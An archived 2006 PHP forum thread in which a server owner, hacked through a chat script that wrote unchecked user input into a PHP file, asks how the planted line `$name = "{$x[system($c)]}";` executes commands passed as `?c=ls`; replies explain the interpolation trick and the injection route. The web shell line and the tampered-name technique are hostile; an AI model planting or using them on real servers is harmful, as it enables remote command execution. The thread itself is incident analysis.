473,394 Members | 1,201 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

Join Bytes to post your question to a community of 473,394 software developers and data experts.

Hacked with system()

Hello,

our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>

save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
I couldn't find anything about this on the web (didn't know how to
specify the search to get useful results). Can anybody explain what
happens?

Thanks and best regards,
Ingo

Sep 5 '06 #1
8 1493
Oski wrote:
our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>

save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
If you write
$a = "{$x['key']}";

then $a gets the value $x['key'] as expected.

$a = $x[system($c)];

then $a gets the element of the array $x corresponding to the return
value of system($c) (and as a side-effect, system($c) has been called).

It seems like combining these two features allows you to execute code
within a double-quoted string, merely by referencing the string literal.

I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.

Tim
Sep 5 '06 #2
Tim Martin wrote:
Oski wrote:
>our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>

save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.

If you write
$a = "{$x['key']}";

then $a gets the value $x['key'] as expected.

$a = $x[system($c)];

then $a gets the element of the array $x corresponding to the return
value of system($c) (and as a side-effect, system($c) has been called).

It seems like combining these two features allows you to execute code
within a double-quoted string, merely by referencing the string literal.

I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.
Following up to myself, I should note that this is not as big an issue
as it seems on the surface - it only matters if the malicious user
writes the string literal itself. If they control a variable that is
substituted into the string literal, it isn't a problem. e.g.

$intermediate = "system($c)"; // Set by malicious user from a form input
// or some other non-string-literal

$a = "{$x[$intermediate]}"; // This code written by you, not under the
// control of the malicious user

is fine.

Tim
Sep 5 '06 #3
In article <11**********************@m79g2000cwm.googlegroups .com>,
"Oski" <os**@gmx.dewrote:
Hello,

our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>

save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
Well, it's odd. system() returns the last line of output if
successful. But in this case, $name is set to the value of $x where
the key is the last line of the ouput. Is there any $x declaration in
the script?

For instance, this:

<?
$x["var"] = "foobar";
$c = "ls";
$name = "{$x[system($c)]}";
print "Value: $name";
?>

Outpus, after a long list of directories in my root directorie (where
'var' is the last):

Value: foobar

So, "var" is the last directory in the ls listing. And the value of
$x["var"] is "foobar", which is assigned to $name.

Why? I have no idea. I'd have top see the entire script for that.
--
Sandman[.net]
Sep 5 '06 #4
our server got hacked through a security hole in an open source php
chat script.
Which one?

Regards,
Talthen
Sep 5 '06 #5
Sandman wrote:
Why? I have no idea. I'd have top see the entire script for that.
There is no more script, no more than what was posted by me! The other
lines (mentioned as ommitted) are only other declarations of scalar
variables. If you omit these, the effect is quite the same.

Btw, I'll not disclose which script is vulnerable (at least not now).
I consider contacting the authors first - if this thread turns out to
be a real security hole ...

Ingo.

Sep 5 '06 #6
In article <11*********************@m73g2000cwd.googlegroups. com>,
"Oski" <os**@gmx.dewrote:
Sandman wrote:
Why? I have no idea. I'd have top see the entire script for that.

There is no more script, no more than what was posted by me! The other
lines (mentioned as ommitted) are only other declarations of scalar
variables. If you omit these, the effect is quite the same.

Btw, I'll not disclose which script is vulnerable (at least not now).
I consider contacting the authors first - if this thread turns out to
be a real security hole ...
Then I suppose the script, as seen, was a small part of a larger
"hack" library, which the author cut'n'pasted from.

I've been "hacked" this was also, so I've seen some of these scripts.


--
Sandman[.net]
Sep 5 '06 #7
Oski wrote:
This chat script allowed the user to create a new php script on our
server, [snip]
Surely this is the security hole rather than the script created.
Allowing anyone to write php code that will run on your server is a
Really Bad Idea (tm).

Robin
Sep 5 '06 #8
Sandman wrote:
Then I suppose the script, as seen, was a small part of a larger
"hack" library, which the author cut'n'pasted from.

I've been "hacked" this was also, so I've seen some of these scripts.
In this case, the chat script asks for your name and email when
registering.
Then, it creates a php-script (as described in my first post) and
creates lines within it:
$name = "<userinput>";
$email = "<userinput_2";
// and so on ...
So you just have to know where this php script is created/saved and
register with a tampered name and then call this php script with the
desired URL + encoded command strings, like "?c=ls%20-l" etc.

Of course, the real (huuuge!) security hole is creating a php script
with unchecked userinput. (I don't dare to guess what might happen if
you have disabled magic_quotes).

But I could not explain the behaviour of PHP as well, especially as
there is nothing documented about this "feature" to execute code within
a variable assignment.

Ingo

Sep 5 '06 #9

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

6
by: Bob Bedford | last post by:
My database suddently dissapeared from my ISP. I've logged in and the database doesn't exist anymore. I don't know anything about website hacking, so my code is possibly open for hackers. ...
0
by: arkain denial | last post by:
this site can't be hacked: http://www.bleacheatingfreaks.com/?ref=Goat_Punisher
0
by: Christian Schuhegger | last post by:
Hi, I remember that I've seen some time ago (perhaps a year or so) a project on freshmeat where a guy hacked a postgres c-interface library (i guess it was libpq / or perhaps he just used the...
10
by: Doc | last post by:
I keep reading about various websites being hacked into and wonder, how is this done? Not for any nefarious reasons, but to take measures to protect mine. Apparently this has been done to some high...
2
by: codefixer | last post by:
Hello: The phpBB sites are hacked. If you search for "HACKED BY CYBER-ATTACK" on msn.com you will get a list of all the sites hacked. Anyone knows what is the way to clean this up ? Thanks.
1
by: rerdavies | last post by:
OS: WIndows Server 2003. Currently logged in user is running with German(German) regional settings. Code fragment: System.Globalization.CultureInfo culture = new...
5
by: David Carter | last post by:
Hello I switched my computer on today and found that a new login of "ASP.net" had been added, it was a full priviledge account. Can anyone tell me what has happened? I have no idea what ASP is so...
0
by: vikassaxena | last post by:
website was hacked on 24 march , the script the browser is gettting from server was normal but still the the browser shows it's being hacked when after saving the view source i open it on...
2
by: premMS143 | last post by:
Hi, I want to ping certain systems IP. Everytime I'm using DOS or Start --> Run mode for pinging different PCs. But its becoming very difficult. So I planned to develop a VB application to make...
0
by: Charles Arthur | last post by:
How do i turn on java script on a villaon, callus and itel keypad mobile phone
0
by: ryjfgjl | last post by:
In our work, we often receive Excel tables with data in the same format. If we want to analyze these data, it can be difficult to analyze them because the data is spread across multiple Excel files...
0
by: emmanuelkatto | last post by:
Hi All, I am Emmanuel katto from Uganda. I want to ask what challenges you've faced while migrating a website to cloud. Please let me know. Thanks! Emmanuel
1
by: Sonnysonu | last post by:
This is the data of csv file 1 2 3 1 2 3 1 2 3 1 2 3 2 3 2 3 3 the lengths should be different i have to store the data by column-wise with in the specific length. suppose the i have to...
0
by: Hystou | last post by:
There are some requirements for setting up RAID: 1. The motherboard and BIOS support RAID configuration. 2. The motherboard has 2 or more available SATA protocol SSD/HDD slots (including MSATA, M.2...
0
marktang
by: marktang | last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However,...
0
by: Hystou | last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can...
0
jinu1996
by: jinu1996 | last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven...
0
by: Hystou | last post by:
Overview: Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.